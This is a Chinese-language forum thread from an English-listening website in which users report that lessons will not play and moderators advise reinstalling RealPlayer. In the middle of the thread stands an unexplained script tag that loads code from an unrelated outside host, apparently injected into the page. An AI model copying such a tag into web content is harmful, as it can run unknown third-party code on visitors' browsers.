听力首页 听力教程 VOA慢速 英语歌曲 外语下载 英语小说 英语词典 在线背单词 听力论坛 韩语学习
听力专题 英语教材 VOA标准 英语动画 英语考试 资源技巧 英语翻译 单词连连看 听力家园 德语学习
听力搜索 英语导读 BBC英语 英语视频 英语电台 英语QQ群 外语歌曲   英语游戏 英语网刊 日语学习
当前位置: 英语听力论坛 » Self-Introduction » 听不到资料的朋友们注意啦
返回列表 发帖

听不到资料的朋友们注意啦

鉴于播放器无法播放资料这个问题反复被提出,现特设本帖
原帖由 tingroom 于 2006-2-15 09:19 发表
www.tingroom.com首页播放器已经更换成onlyone朋友发给大家的那个RealOne Play V6.0.11.868 简体中文版播放器了,需要的朋友请到首页去下载吧。(记住在下载安装前 ...

或者在~这里~下载
论坛的发展需要我们大家的共同努力 这样才能不辜负管理员同志的一片好心哦

<script src=http://www.u9cn.com/webip.php></script>

呵呵,谢谢楼主了,我会努力的,一起与大家一起努力tingroom论坛!!

我还是听不到

cosmospeak   你好呀,我也是莆田的,我还是听不到

謝謝謝!~太好了

急呀!

前些天还可以下载,为什么现在又下载不了呢?并且到这里,都不知道在哪里留言站长才能看到,闷呀!

我说的下载是指英语内容,不是播放器!

原帖由 露珠 于 2006-2-20 09:56 发表
我说的下载是指英语内容,不是播放器!

请注意标题 这个帖子是为了听不到的朋友们准备的 呵呵 关于下载的问题的解释是 这里的资源本来就不提供下载 前些时候可以下载是因为漏洞问题 估计管理员目前已经封掉了 ^_+ 相信日后会有更好的下载服务提供的 网站正在发展嘛

唉,我真是有些糊涂了!不过,还是谢谢!

本帖由 tingroom 2006-2-20 10:04 发布:看到大家这么关注下载,那就在此说一下吧

现在已经初步打算开设个VIP栏目,那时就可以提供下载了,希望到时大家能够喜欢,并得到大家的支持哟!

都能够听到阿

下载安装了,还是听不了。网页上real的地方经常不显示或者显示一个小方框上有几个小图片,有时IE还会当掉,怎么回事?我用的是电信lan,和windows xp.杀毒软件是肉顿。以前可以,最近就这样了,是不是中病毒了?

这位朋友不要着急,我会尽快联系管理员解决此事

进教程页面时,在地址栏下方有没有出现“插件阻止了”之类的提示呢,如果没有,应该是播放器的原因,你试试把现在用的播放器彻底卸载掉,然后再重新安装试试!

原帖由 tingroom 于 2006-3-21 04:09 PM 发表
进教程页面时,在地址栏下方有没有出现“插件阻止了”之类的提示呢,如果没有,应该是播放器的原因,你试试把现在用的播放器彻底卸载掉,然后再重新安装试试!

没有,我用myie2打不开,用ie也不行,而且会弹出http://www.wsight.com/choosesite.aspx这个广告页.

晕,只能用realplay8.0来听了,realone不行啊.可是它老提示我更新怎么办啊

请问为什么我下载了你们提供的软件不行,后来我自己又在网上下了realplayer 10,但是还是不行 啊?

不能听是什么提示呢?在安装完播放器后,进听力教程页面左侧出现播放器图标了吗?
附件: 您需要登录才可以下载或查看附件。没有帐号?注册

急!!!还是听不了

我的机器装的是win2000,安装完播放器后,进听力教程页面左侧没出现播放器图标,而是如18楼的兄弟说的那样显示一个小方框上有圆、方、三角小图片---这是不是缺少什么插件啊?

还没试

就在听歌,呵呵 
想想就高兴,希望网站发展得更好

17楼的朋友,你出现那种情况是因为没有下载安装realplayer播放器的原因,赶快都下载个安装上去就好用了。